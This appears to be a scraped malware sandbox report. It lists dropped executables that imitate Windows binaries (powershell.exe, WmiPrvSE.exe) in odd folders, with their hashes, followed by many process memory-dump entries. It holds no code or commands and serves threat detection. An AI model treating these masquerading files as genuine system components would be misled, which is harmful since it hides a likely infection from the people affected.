7aeb0f8f5e5a81fb192d7e0b78b0fee1

SHA1
e1b687512e02de7a95923502f8a6e6e5de138db7

SHA256
1e51c848e270506770baa7d39df81403c3636ff621a78c2f2ca36f9a9844618b

SHA512
232b509fb86ec6b54977780a3c29222bad48880b031d67897b63abcb116b66580b3853e40674869c387105a211f91d30388bd07b938f14674e15b83cee2e61c0

Download Submit
C:\comsavesbroker\containersavesdhcp.exe

Filesize
2.7MB

MD5
7aeb0f8f5e5a81fb192d7e0b78b0fee1

SHA1
e1b687512e02de7a95923502f8a6e6e5de138db7

SHA256
1e51c848e270506770baa7d39df81403c3636ff621a78c2f2ca36f9a9844618b

SHA512
232b509fb86ec6b54977780a3c29222bad48880b031d67897b63abcb116b66580b3853e40674869c387105a211f91d30388bd07b938f14674e15b83cee2e61c0

Download Submit
C:\comsavesbroker\powershell.exe

Filesize
2.7MB

MD5
f2106c0ecf10931dd45434522795d134

SHA1
704e1bce9f77672a021f981d3217f69020b192f1

SHA256
094de3ce16dc4f3a32d403832dd3721f74eb2a8779d7a4b88a68f9d00e21808a

SHA512
d8718b876112f2d4b0a8b323c1e1ececf4bcfcf9693b0deca66f711325728c6a065a0ef4593950da44080c926c0081504798822cf954d51c73009f80846c8314

Download Submit
C:\comsavesbroker\powershell.exe

Filesize
2.7MB

MD5
f2106c0ecf10931dd45434522795d134

SHA1
704e1bce9f77672a021f981d3217f69020b192f1

SHA256
094de3ce16dc4f3a32d403832dd3721f74eb2a8779d7a4b88a68f9d00e21808a

SHA512
d8718b876112f2d4b0a8b323c1e1ececf4bcfcf9693b0deca66f711325728c6a065a0ef4593950da44080c926c0081504798822cf954d51c73009f80846c8314

Download Submit
C:\comsavesbroker\powershell.exe

Filesize
2.7MB

MD5
f2106c0ecf10931dd45434522795d134

SHA1
704e1bce9f77672a021f981d3217f69020b192f1

SHA256
094de3ce16dc4f3a32d403832dd3721f74eb2a8779d7a4b88a68f9d00e21808a

SHA512
d8718b876112f2d4b0a8b323c1e1ececf4bcfcf9693b0deca66f711325728c6a065a0ef4593950da44080c926c0081504798822cf954d51c73009f80846c8314

Download Submit
C:\comsavesbroker\powershell.exe

Filesize
2.7MB

MD5
f2106c0ecf10931dd45434522795d134

SHA1
704e1bce9f77672a021f981d3217f69020b192f1

SHA256
094de3ce16dc4f3a32d403832dd3721f74eb2a8779d7a4b88a68f9d00e21808a

SHA512
d8718b876112f2d4b0a8b323c1e1ececf4bcfcf9693b0deca66f711325728c6a065a0ef4593950da44080c926c0081504798822cf954d51c73009f80846c8314

Download Submit
C:\comsavesbroker\powershell.exe

Filesize
2.7MB

MD5
f2106c0ecf10931dd45434522795d134

SHA1
704e1bce9f77672a021f981d3217f69020b192f1

SHA256
094de3ce16dc4f3a32d403832dd3721f74eb2a8779d7a4b88a68f9d00e21808a

SHA512
d8718b876112f2d4b0a8b323c1e1ececf4bcfcf9693b0deca66f711325728c6a065a0ef4593950da44080c926c0081504798822cf954d51c73009f80846c8314

Download Submit
C:\comsavesbroker\powershell.exe

Filesize
2.7MB

MD5
f2106c0ecf10931dd45434522795d134

SHA1
704e1bce9f77672a021f981d3217f69020b192f1

SHA256
094de3ce16dc4f3a32d403832dd3721f74eb2a8779d7a4b88a68f9d00e21808a

SHA512
d8718b876112f2d4b0a8b323c1e1ececf4bcfcf9693b0deca66f711325728c6a065a0ef4593950da44080c926c0081504798822cf954d51c73009f80846c8314

Download Submit
C:\comsavesbroker\powershell.exe

Filesize
2.7MB

MD5
f2106c0ecf10931dd45434522795d134

SHA1
704e1bce9f77672a021f981d3217f69020b192f1

SHA256
094de3ce16dc4f3a32d403832dd3721f74eb2a8779d7a4b88a68f9d00e21808a

SHA512
d8718b876112f2d4b0a8b323c1e1ececf4bcfcf9693b0deca66f711325728c6a065a0ef4593950da44080c926c0081504798822cf954d51c73009f80846c8314

Download Submit
C:\comsavesbroker\powershell.exe

Filesize
2.7MB

MD5
f2106c0ecf10931dd45434522795d134

SHA1
704e1bce9f77672a021f981d3217f69020b192f1

SHA256
094de3ce16dc4f3a32d403832dd3721f74eb2a8779d7a4b88a68f9d00e21808a

SHA512
d8718b876112f2d4b0a8b323c1e1ececf4bcfcf9693b0deca66f711325728c6a065a0ef4593950da44080c926c0081504798822cf954d51c73009f80846c8314

Download Submit
C:\comsavesbroker\powershell.exe

Filesize
2.7MB

MD5
f2106c0ecf10931dd45434522795d134

SHA1
704e1bce9f77672a021f981d3217f69020b192f1

SHA256
094de3ce16dc4f3a32d403832dd3721f74eb2a8779d7a4b88a68f9d00e21808a

SHA512
d8718b876112f2d4b0a8b323c1e1ececf4bcfcf9693b0deca66f711325728c6a065a0ef4593950da44080c926c0081504798822cf954d51c73009f80846c8314

Download Submit
C:\comsavesbroker\powershell.exe

Filesize
2.7MB

MD5
f2106c0ecf10931dd45434522795d134

SHA1
704e1bce9f77672a021f981d3217f69020b192f1

SHA256
094de3ce16dc4f3a32d403832dd3721f74eb2a8779d7a4b88a68f9d00e21808a

SHA512
d8718b876112f2d4b0a8b323c1e1ececf4bcfcf9693b0deca66f711325728c6a065a0ef4593950da44080c926c0081504798822cf954d51c73009f80846c8314

Download Submit
C:\comsavesbroker\powershell.exe

Filesize
2.7MB

MD5
f2106c0ecf10931dd45434522795d134

SHA1
704e1bce9f77672a021f981d3217f69020b192f1

SHA256
094de3ce16dc4f3a32d403832dd3721f74eb2a8779d7a4b88a68f9d00e21808a

SHA512
d8718b876112f2d4b0a8b323c1e1ececf4bcfcf9693b0deca66f711325728c6a065a0ef4593950da44080c926c0081504798822cf954d51c73009f80846c8314

Download Submit
C:\comsavesbroker\powershell.exe

Filesize
2.7MB

MD5
f2106c0ecf10931dd45434522795d134

SHA1
704e1bce9f77672a021f981d3217f69020b192f1

SHA256
094de3ce16dc4f3a32d403832dd3721f74eb2a8779d7a4b88a68f9d00e21808a

SHA512
d8718b876112f2d4b0a8b323c1e1ececf4bcfcf9693b0deca66f711325728c6a065a0ef4593950da44080c926c0081504798822cf954d51c73009f80846c8314

Download Submit
C:\comsavesbroker\powershell.exe

Filesize
2.7MB

MD5
f2106c0ecf10931dd45434522795d134

SHA1
704e1bce9f77672a021f981d3217f69020b192f1

SHA256
094de3ce16dc4f3a32d403832dd3721f74eb2a8779d7a4b88a68f9d00e21808a

SHA512
d8718b876112f2d4b0a8b323c1e1ececf4bcfcf9693b0deca66f711325728c6a065a0ef4593950da44080c926c0081504798822cf954d51c73009f80846c8314

Download Submit
C:\comsavesbroker\powershell.exe

Filesize
2.7MB

MD5
f2106c0ecf10931dd45434522795d134

SHA1
704e1bce9f77672a021f981d3217f69020b192f1

SHA256
094de3ce16dc4f3a32d403832dd3721f74eb2a8779d7a4b88a68f9d00e21808a

SHA512
d8718b876112f2d4b0a8b323c1e1ececf4bcfcf9693b0deca66f711325728c6a065a0ef4593950da44080c926c0081504798822cf954d51c73009f80846c8314

Download Submit
C:\odt\WmiPrvSE.exe

Filesize
2.7MB

MD5
45e36882a12f017e5f9e9361339512bb

SHA1
0b3f1c506ba4f0780dcc763e2c2e428973c5b1bc

SHA256
b38e9d3c24c2755d07955ebd8443cf123d98ed59ace4b7aa68541de1a8df9d69

SHA512
b786eddeafd09b6cd0b942d04ca042e5c2848585dc04f6c58c56c022d5c3b43757bba9ecdb542781c02bbdf1a1bed583d0ef92173ee0ed50ae22cfafae0e1ec6

Download Submit
C:\odt\WmiPrvSE.exe

Filesize
2.7MB

MD5
45e36882a12f017e5f9e9361339512bb

SHA1
0b3f1c506ba4f0780dcc763e2c2e428973c5b1bc

SHA256
b38e9d3c24c2755d07955ebd8443cf123d98ed59ace4b7aa68541de1a8df9d69

SHA512
b786eddeafd09b6cd0b942d04ca042e5c2848585dc04f6c58c56c022d5c3b43757bba9ecdb542781c02bbdf1a1bed583d0ef92173ee0ed50ae22cfafae0e1ec6

Download Submit
memory/112-202-0x0000000000000000-mapping.dmp

Download
memory/212-141-0x0000000000000000-mapping.dmp

Download
memory/376-250-0x0000000000000000-mapping.dmp

Download
memory/376-276-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/504-145-0x0000000000000000-mapping.dmp

Download
memory/504-147-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/504-186-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/504-174-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/844-200-0x0000000000000000-mapping.dmp

Download
memory/852-252-0x0000000000000000-mapping.dmp

Download
memory/852-277-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/876-153-0x0000000000090000-0x00000000004DA000-memory.dmp

Filesize
4.3MB

Download
memory/876-217-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/876-150-0x0000000000000000-mapping.dmp

Download
memory/876-160-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/876-187-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/1056-257-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/1056-239-0x0000000000000000-mapping.dmp

Download
memory/1080-258-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/1080-244-0x0000000000000000-mapping.dmp

Download
memory/1088-266-0x0000000000000000-mapping.dmp

Download
memory/1128-169-0x00000000058A0000-0x00000000059AA000-memory.dmp

Filesize
1.0MB

Download
memory/1128-148-0x0000000000000000-mapping.dmp

Download
memory/1128-190-0x0000000007160000-0x00000000071D6000-memory.dmp

Filesize
472KB

Download
memory/1128-191-0x00000000078B0000-0x00000000078CE000-memory.dmp

Filesize
120KB

Download
memory/1128-189-0x00000000070C0000-0x0000000007152000-memory.dmp

Filesize
584KB

Download
memory/1128-164-0x0000000005600000-0x000000000563C000-memory.dmp

Filesize
240KB

Download
memory/1128-179-0x0000000006B80000-0x0000000006D42000-memory.dmp

Filesize
1.8MB

Download
memory/1128-180-0x0000000007280000-0x00000000077AC000-memory.dmp

Filesize
5.2MB

Download
memory/1128-163-0x00000000055A0000-0x00000000055B2000-memory.dmp

Filesize
72KB

Download
memory/1128-162-0x0000000005B70000-0x0000000006188000-memory.dmp

Filesize
6.1MB

Download
memory/1128-158-0x0000000000C10000-0x0000000000C2E000-memory.dmp

Filesize
120KB

Download
memory/1128-188-0x0000000007D60000-0x0000000008304000-memory.dmp

Filesize
5.6MB

Download
memory/1128-183-0x0000000006D50000-0x0000000006DB6000-memory.dmp

Filesize
408KB

Download
memory/1132-227-0x0000000000000000-mapping.dmp

Download
memory/1132-248-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/1148-256-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/1148-232-0x0000000000000000-mapping.dmp

Download
memory/1148-206-0x0000000000000000-mapping.dmp

Download
memory/1308-221-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/1468-198-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/1468-214-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/1468-194-0x0000000000000000-mapping.dmp

Download
memory/1608-173-0x0000000000000000-mapping.dmp

Download
memory/1668-196-0x0000000000000000-mapping.dmp

Download
memory/1708-132-0x0000000000000000-mapping.dmp

Download
memory/1764-204-0x0000000000000000-mapping.dmp

Download
memory/1856-157-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/1856-139-0x0000000000000000-mapping.dmp

Download
memory/1856-143-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/1980-215-0x0000000000000000-mapping.dmp

Download
memory/2152-146-0x0000000000000000-mapping.dmp

Download
memory/2160-220-0x0000000000000000-mapping.dmp

Download
memory/2160-222-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/2160-197-0x0000000000000000-mapping.dmp

Download
memory/2312-213-0x0000000000000000-mapping.dmp

Download
memory/2360-136-0x0000027D2FB20000-0x0000027D2FB42000-memory.dmp

Filesize
136KB

Download
memory/2360-134-0x0000000000000000-mapping.dmp

Download
memory/2360-142-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/2360-137-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/2388-133-0x0000000000000000-mapping.dmp

Download
memory/2432-203-0x0000000000000000-mapping.dmp

Download
memory/2464-171-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/2464-166-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/2464-161-0x0000000000000000-mapping.dmp

Download
memory/2644-243-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/2644-226-0x0000000000000000-mapping.dmp

Download
memory/2880-208-0x0000000000000000-mapping.dmp

Download
memory/3012-273-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/3012-237-0x0000000000000000-mapping.dmp

Download
memory/3060-195-0x0000000000000000-mapping.dmp

Download
memory/3172-261-0x0000000000000000-mapping.dmp

Download
memory/3180-140-0x0000000000000000-mapping.dmp

Download
memory/3332-260-0x0000000000000000-mapping.dmp

Download
memory/3400-267-0x0000000000000000-mapping.dmp

Download
memory/3408-263-0x0000000000000000-mapping.dmp

Download
memory/3496-216-0x0000000000000000-mapping.dmp

Download
memory/3548-211-0x0000000000000000-mapping.dmp

Download
memory/3776-264-0x0000000000000000-mapping.dmp

Download
memory/3824-265-0x0000000000000000-mapping.dmp

Download
memory/3828-192-0x0000000000000000-mapping.dmp

Download
memory/3916-255-0x0000000000000000-mapping.dmp

Download
memory/3948-223-0x0000000000000000-mapping.dmp

Download
memory/3948-238-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/3948-231-0x0000000000DE0000-0x0000000001092000-memory.dmp

Filesize
2.7MB

Download
memory/4000-253-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/4000-230-0x0000000000000000-mapping.dmp

Download
memory/4268-241-0x0000000000000000-mapping.dmp

Download
memory/4268-275-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/4300-268-0x0000000000000000-mapping.dmp

Download
memory/4300-271-0x0000000000BA0000-0x0000000000E52000-memory.dmp

Filesize
2.7MB

Download
memory/4328-154-0x0000000000000000-mapping.dmp

Download
memory/4436-262-0x0000000000000000-mapping.dmp

Download
memory/4508-167-0x0000000000000000-mapping.dmp

Download
memory/4560-201-0x0000000000000000-mapping.dmp

Download
memory/4560-278-0x0000000000000000-mapping.dmp

Download
memory/4636-212-0x0000000000000000-mapping.dmp

Download
memory/4656-259-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/4656-246-0x0000000000000000-mapping.dmp

Download
memory/4712-193-0x0000000000000000-mapping.dmp

Download
memory/4804-209-0x0000000000000000-mapping.dmp

Download
memory/4808-210-0x0000000000000000-mapping.dmp

Download
memory/4872-207-0x0000000000000000-mapping.dmp

Download
memory/4924-184-0x000000001CDE0000-0x000000001D308000-memory.dmp

Filesize
5.2MB

Download
memory/4924-274-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/4924-205-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/4924-182-0x0000000002C40000-0x0000000002C90000-memory.dmp

Filesize
320KB

Download
memory/4924-181-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/4924-178-0x0000000000790000-0x0000000000A42000-memory.dmp

Filesize
2.7MB

Download
memory/4924-175-0x0000000000000000-mapping.dmp

Download
memory/5024-272-0x00007FFCEE180000-0x00007FFCEEC41000-memory.dmp

Filesize
10.8MB

Download
memory/5024-235-0x0000000000000000-mapping.dmp

Download